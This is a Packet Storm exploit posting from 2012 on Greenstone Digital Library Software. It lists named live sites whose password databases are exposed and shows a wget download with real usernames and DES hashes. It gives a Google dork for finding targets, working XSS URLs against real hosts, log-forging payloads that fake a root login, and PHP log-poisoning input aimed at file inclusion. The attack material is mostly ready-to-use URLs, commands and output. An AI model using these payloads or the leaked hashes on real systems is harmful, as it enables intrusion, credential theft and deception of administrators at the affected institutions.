exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Greenstone XSS / Password Disclosure / Log Forging

Greenstone XSS / Password Disclosure / Log Forging
Posted Nov 23, 2012
Authored by Akastep

Greenstone Digital Library Software suffers from cross site scripting, password file disclosure, broken salt, and log forging vulnerabilities.

tags | exploit, vulnerability, xss, info disclosure
SHA-256 | 6abb1bda55fdf2a144f85a5781c58e9555df57ab3346329f169d03b28b7f55e7

Greenstone XSS / Password Disclosure / Log Forging

Change Mirror Download
========================================================================
Vulnerable Software: Greenstone Digital Library Software.
Official Site: http://www.greenstone.org/
Dork: inurl:gsdl/etc/

==========================================================================
About software:

The aim of the Greenstone software is to empower users,
particularly in universities, libraries,
and other public service institutions,
to build their own digital libraries.
Digital libraries are radically reforming how information
is disseminated and acquired in UNESCO's partner communities
and institutions in the fields of education, science
and culture around the world, and particularly in developing countries.
==========================================================================
About Vulnerabilities.



This software: is prone to multiple vulnerabilities such as:

[*] Password file Disclosure,
[*] Cross Site Scripting,
[*] Log File forging,Log File poisoning,
[*] Default salt,
[*] Unrestricted access to system/configuration files.
(As well as to passwords file as mentinoned above.)

=================Let's Roll============================


Password file disclosure:

http://greenstone.flib.sci.am/gsdl/etc/users.gdb
http://greenstone.flib.sci.am/gsdl/etc/key.gdb
http://greenstone.martinique.univ-ag.fr/gsdl/etc/users.db
http://greenstone.martinique.univ-ag.fr/gsdl/etc/key.db

Example:
(P.S Password encryption: Des (Unix))
===================== Reproduce =====================
$ wget http://greenstone.flib.sci.am/gsdl/etc/users.gdb && cat users.gdb
--2012-11-22 17:04:39-- http://greenstone.flib.sci.am/gsdl/etc/users.gdb
Resolving greenstone.flib.sci.am (greenstone.flib.sci.am)... 93.187.162.197
Connecting to greenstone.flib.sci.am (greenstone.flib.sci.am)|93.187.162.197|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12926 (13K) [text/plain]
Saving to: `users.gdb'

100%[==========================================>] 12,926 31.8K/s in 0.4s

2012-11-22 17:04:40 (31.8 KB/s) - `users.gdb' saved [12926/12926]
.......Some junk snip........
▒▒▒ admin<comment>created at install time
<enabled>true
<groups>administrator,colbuilder,all-collections-editor
<password>TpM5gyFpfCsLc
<username>admindemo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>Tpp90HTz/jz9w
<username>demotatevik<comment>
<enabled>true
<groups>all-collections-editor
<password>Tpyq8s1oUIioc
<username>tatevik
azgayin<comment>
<enabled>true
<groups>all-collections-editor
<password>Tp53Vsj1qM4cE
<username>azgayin
demo<comment>Dummy 'demo' user with password 'demo' for authen-e collection
<enabled>true
<groups>demo
<password>TpzWMQXVfKFvw
<username>demo

========================= END OF users.gbd============================


Known salt issuse (because this application uses "setpasswd" utility via
hardcoded salt=>: Tp)
(Especially on windows systems)



================================BEGIN================================
/**********************************************************************
*
* setpasswd.cpp --
* Copyright (C) 2000 The New Zealand Digital Library Project
*
* A component of the Greenstone digital library software
* from the New Zealand Digital Library Project at the
* University of Waikato, New Zealand.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation; either version 2 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
*
*********************************************************************/

// setpasswd is a windows application that can be used to encrypt a password
// and write it (along with its corresponding username) to a gdbm database.

// it handles writing to the gdbm database itself to avoid having to call
// the txt2db console application (and therefore avoiding the console
// window popping up when called from another windows application).

// note that setpasswd does no checking to make sure that any of it's
// input arguments are valid (or even reasonable) values.

// this program should be compiled into a binary called setpw.exe (to be
// short enough not to mess with 16 bit Windows platforms).

// usage:
// setpw -u username -p password -o output_gdbm_file

#include "text_t.h"
#include "crypt.h"
#include "autoconf.h"
#include "systems.h"
#include "gdbmconst.h"
#include "gdbm.h"

#include <windows.h>

text_t username;
text_t password;
text_t output_gdbm_file;

bool parse_cmdline (LPSTR cmdline) {

bool in_quote = false;
text_t arg;
text_tarray args;
unsigned char *c = (unsigned char *)cmdline;
while (*c != '\0') {
if (*c == '"') {
if (!in_quote) {
in_quote = true;
} else {
in_quote = false;
if (!arg.empty()) args.push_back (arg);
arg.clear();
}
} else if (*c == ' ' && !in_quote) {
if (!arg.empty()) args.push_back (arg);
arg.clear();
} else {
arg.push_back (*c);
}
++c;
}
if (!arg.empty()) args.push_back (arg);

text_tarray::const_iterator here = args.begin();
text_tarray::const_iterator end = args.end();
while (here != end) {
if (*here == "-u" && (++here != end)) username = *here;
else if (*here == "-p" && (++here != end)) password = *here;
else if (*here == "-o" && (++here != end)) output_gdbm_file = *here;
if (here != end) ++here;
}
if (username.empty() || password.empty() || output_gdbm_file.empty()) {
MessageBox (NULL, "Usage:\n setpasswd -u username -p password -o output_gdbm_file",
"setpasswd failed", MB_OK);
return false;
}
return true;
}

text_t crypt_text (const text_t &text) {
static const char *salt = "Tp";
text_t crypt_password;

if (text.empty()) return "";

// encrypt the password
char *text_cstr = text.getcstr();
if (text_cstr == NULL) return "";
crypt_password = crypt(text_cstr, salt);
delete []text_cstr;

return crypt_password;
}

bool add_to_db () {

int block_size = 0;
GDBM_FILE dbf;
char *dbname = output_gdbm_file.getcstr();

// open the database
int read_write = GDBM_WRCREAT;
dbf = gdbm_open (dbname, block_size, read_write, 00664, NULL, 1);
if (dbf == NULL) {
MessageBox (NULL, "gdbm_open failed\n", "setpasswd", MB_OK);
return false;
}

datum key_data;
key_data.dptr = username.getcstr();
if (key_data.dptr == NULL) {
MessageBox (NULL, "null key_data\n", "setpasswd", MB_OK);
return false;
}
key_data.dsize = strlen(key_data.dptr);

text_t value = "<comment>\n";
value += "<enabled>true\n";
value += "<groups>administrator,colbuilder\n";
value += "<password>" + password + "\n";
value += "<username>" + username + "\n";

datum value_data;
value_data.dptr = value.getcstr();
if (value_data.dptr == NULL) {
MessageBox (NULL, "null value_data\n", "setpasswd", MB_OK);
return false;
}
value_data.dsize = strlen(value_data.dptr);

// store the value
if (gdbm_store (dbf, key_data, value_data, GDBM_REPLACE) < 0) {
MessageBox (NULL, "gdbm_store failed\n", "setpasswd", MB_OK);
return false;
}
gdbm_close (dbf);

delete []key_data.dptr;
delete []value_data.dptr;
delete []dbname;
return true;
}

int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
LPSTR lpCmdLine, int nCmdShow) {

// parse command line arguments
if (!parse_cmdline (lpCmdLine)) return 1;

// encrypt the password
password = crypt_text (password);

// append the password and username to database
add_to_db();

return 0;
}

============================================================

XSS:

site.tld/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=<script>alert("OwnEd");</script>
Demo:
http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E

http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E%20%3E%3E%20greenstone.flib.greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=collectioninfo&pr=7&c=%3Cscript%3Ealert%28%22OwnEd%22%29;%3C/script%3E

http://greenstone.flib.sci.am/gsdl/cgi-bin/library.cgi?a=status&p=%22%3E%3Cscript%3Ealert%28%22Again%20Owned%22%29;%3C/script%3E&pr=7&c=AkaStep


============================================================



Log forging:

http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223"%0D%0A%0D%0AWarning: Accepted connection from unknown host to local port: 22 root logged in%29%0D%0A%0D%0A" cmd.exe


http://greenstone.unam.na/gsdl/cgi-bin/library.cgi?e=4?e=%223%0D%0A%0D%0AError%20D:\Program%20Files\Greenstone\%20directory%20owned?%29%0D%0A%0D%0A


Forged log: http://greenstone.unam.na/gsdl/etc/error.txt (CTRL+F and search for: host to local port: 22)

Example:

===================EXAMPLE OF =FORGED LOG====================
Error: the action "4?e="3"



Warning: Accepted connection from unknown host to local port: 22 root logged in) <==Fake entry for Panic system administrator))))))



" cmd.exe" could not be found.

================END OF FORGED LOG=============

Log File Poisoning: (Usefull for LFI)
www.bibliotecamuseodelamemoria.cl/gsdl/cgi-bin/library.cgi?e=4?e="%0d%0a<?php phpinfo();?>%0d%0a%00%00

Poisoned Log can be found in the following places:
site/gsdl/etc/error.txt
or
site/etc/error.txt (<=On Windows systems in ex i found it here)




Example of injected log:
==================================

http://greenstone.unam.na/gsdl/etc/error.txt


Error: the action "4?e="

<?php phpinfo();?>

��" could not be found.
==================================

******************** The End *******************

================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ
+ *Especially to my bro CAMOUFL4G3 *
To All Turkish Hackers

Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close